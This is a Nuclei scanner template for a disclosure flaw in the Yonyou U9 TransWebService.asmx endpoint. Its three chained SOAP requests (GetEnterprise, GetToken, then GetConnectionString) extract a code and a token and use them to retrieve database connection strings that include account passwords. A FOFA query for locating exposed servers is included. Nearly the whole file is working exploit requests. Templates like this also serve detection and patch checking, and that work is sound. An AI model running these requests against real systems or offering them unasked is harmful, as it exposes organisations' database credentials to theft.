id: yonyou-u9-TransWebService-disclosure
info:
  name: 用友 U9 TransWebService.asmx - disclosure
  author: leadlife
  severity: high
  description: 用友u9 GetConnectionString存在信息泄露漏洞，攻击者可通过该漏洞获取数据库连接信息包括数据库账号密码等敏感信息。
  reference: 
    - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8Bu9%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3GetConnectionString%E5%AD%98%E5%9C%A8%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: body="logo-u9.png"
  tags: yonyou,disclosure,u9,oa

http:
  - raw:
      - |
        POST /CS/Office/TransWebService.asmx HTTP/1.1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate, br
        Connection: close
        Cookie: .ASPXANONYMOUS=1trTf5ff2gEkAAAAMzU0N2I3ZjctYzg0OC00YWFmLTliZTEtNDI2NDc1YmYyMTc10; ASP.NET_SessionId=ntvjalpizrae22kebxy5tn0g
        Upgrade-Insecure-Requests: 1
        Priority: u=1
        SOAPAction: http://tempuri.org/GetEnterprise
        Content-Type: text/xml;charset=UTF-8
        Host: {{Hostname}}
        Content-Length: 193

        <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/">
          <soap:Header/>
          <soap:Body>
              <tem:GetEnterprise/>
          </soap:Body>
        </soap:Envelope>
      
      - |+
        POST /CS/Office/TransWebService.asmx HTTP/1.1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate, br
        Connection: close
        Cookie: .ASPXANONYMOUS=1trTf5ff2gEkAAAAMzU0N2I3ZjctYzg0OC00YWFmLTliZTEtNDI2NDc1YmYyMTc10; ASP.NET_SessionId=ntvjalpizrae22kebxy5tn0g
        Upgrade-Insecure-Requests: 1
        Priority: u=1
        SOAPAction: http://tempuri.org/GetToken
        Content-Type: text/xml;charset=UTF-8
        Host: {{Hostname}}
        Content-Length: 274

        <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/">
          <soap:Header/>
          <soap:Body>
              <tem:GetToken>
                <!--type: string-->
                <tem:endId>{{get_code}}</tem:endId>
              </tem:GetToken>
          </soap:Body>
        </soap:Envelope>

      - |+
        POST /CS/Office/TransWebService.asmx HTTP/1.1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate, br
        Connection: close
        Cookie: .ASPXANONYMOUS=1trTf5ff2gEkAAAAMzU0N2I3ZjctYzg0OC00YWFmLTliZTEtNDI2NDc1YmYyMTc10; ASP.NET_SessionId=ntvjalpizrae22kebxy5tn0g
        Upgrade-Insecure-Requests: 1
        Priority: u=1
        SOAPAction: http://tempuri.org/GetConnectionString
        Content-Type: text/xml;charset=UTF-8
        Host: {{Hostname}}
        Content-Length: 325

        <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/">
          <soap:Header/>
          <soap:Body>
              <tem:GetConnectionString>
                <!--type: string-->
                <tem:token>{{get_token}}</tem:token>
              </tem:GetConnectionString>
          </soap:Body>
        </soap:Envelope>
    

    extractors:
      - type: regex
        part: body_1
        internal: true
        name: get_code
        regex:
          - '"Code":"([0-9]+)"'


      - type: regex
        part: body_2
        internal: true
        name: get_token
        regex:
          - '"Token":"([^"]+)"'
          
    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 200 && status_code_2 == 200  && status_code_3 == 200
          - contains_all(body_3,'User','Password=','Source')
        condition: and